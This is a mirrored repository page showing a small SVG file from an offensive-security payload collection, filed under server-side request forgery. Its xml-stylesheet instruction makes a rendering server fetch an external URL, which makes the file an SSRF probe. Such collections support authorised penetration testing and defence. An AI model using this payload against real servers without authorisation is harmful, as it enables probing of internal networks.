1
0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-04-20 04:18:01 +02:00
PayloadsAllTheThings/Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg

6 lines
228 B
XML

<?xml-stylesheet href="http://example.com/style.css"?>
<svg width="100%" height="100%" viewBox="0 0 100 100"
xmlns="http://www.w3.org/2000/svg">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>
</svg>